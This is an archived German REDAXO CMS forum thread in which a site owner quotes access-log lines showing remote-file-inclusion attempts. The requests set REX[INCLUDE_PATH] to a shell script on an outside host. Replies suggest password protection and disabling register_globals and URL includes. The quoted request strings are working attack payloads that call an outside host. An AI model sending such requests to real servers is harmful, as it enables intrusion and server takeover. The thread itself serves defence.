In letzter Zeit habe ich vermehrt solche GET Anfragen:
77.221.130.24 - - [17/Jul/2010:13:36:27 +0200] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 410 351
bzw. kurz danach dann:
77.221.130.24 - - [17/Jul/2010:13:36:27 +0200] "GET /index.php?article_id=8&clang=1/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 410 305
Was wird hier versucht? Als Response kommt ja 410 zurück. Ist das eine Gefahr?
Viele Grüße
Edit:
Auf diversen sicherheitsseiten wird darauf hingewiesen (alle Redaxo-Versionen bis einschl. 4.2.1):
http://xforce.iss.net/xforce/xfdb/26887
Wie könnte ich meine htaccess so umschreiben, dass sämtliche 'REX[INCLUDE_PATH]' parameter ignoriert werden? Oder gibt es einen anderen Weg?
Hallo,
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Zu diesem Thema kannst du etwas in der Doku finden: 1.8 Sicherheitshinweise
<?php print $Footer; ?>
Sven
Ich würde ja die Welt verändern,
doch der Quellcode ist mir zu absurd!
REX 5 :: Tricks und Tipps
REX 5 :: Modulesammlung
Wiki zu Redaxo 3 und 4 (!nur noch im Webarchiv!)
Sven
Ich würde ja die Welt verändern,
doch der Quellcode ist mir zu absurd!
REX 5 :: Tricks und Tipps
REX 5 :: Modulesammlung
Wiki zu Redaxo 3 und 4 (!nur noch im Webarchiv!)
Hi Koala,
ja danke für den Link. Eine htaccess ist auch im include ordner und ein Zugriff auf /redaxo/include/addons/import_export/pages/index.inc.php bzw /index.php?article_id=8&clang=1/redaxo/include/ usw... ist ohne die parameter auch nicht möglich.
Nur gebe ich noch die parameter: ?REX[INCLUDE_PATH]=http://cybershell.fileave.com/Ckrid1.txt mit dazu kommt ein 410 zurück - afaik heißt das ja soviel wie "nicht länger mehr hier vorhanden"... da sollte ja theoretisch doch ein 403 daherkommen? .... deswegen meine 'Panik'. Oder ist die unbegründet?
In meinem Fall habe ich dem redaxo-Order jetzt ein htpasswd verpasst, ist zwar lästig aber wohl am wirkungsvollsten.
Grüße
Marshall
ja danke für den Link. Eine htaccess ist auch im include ordner und ein Zugriff auf /redaxo/include/addons/import_export/pages/index.inc.php bzw /index.php?article_id=8&clang=1/redaxo/include/ usw... ist ohne die parameter auch nicht möglich.
Nur gebe ich noch die parameter: ?REX[INCLUDE_PATH]=http://cybershell.fileave.com/Ckrid1.txt mit dazu kommt ein 410 zurück - afaik heißt das ja soviel wie "nicht länger mehr hier vorhanden"... da sollte ja theoretisch doch ein 403 daherkommen? .... deswegen meine 'Panik'. Oder ist die unbegründet?
In meinem Fall habe ich dem redaxo-Order jetzt ein htpasswd verpasst, ist zwar lästig aber wohl am wirkungsvollsten.
Grüße
Marshall
-
Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Am effektivsten ist es, register_globals, allow_url_fopen und allow_url_include zu deaktivieren, damit sind diese Art Angriffe sauber und an der richtigen Stelle unterbunden.
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert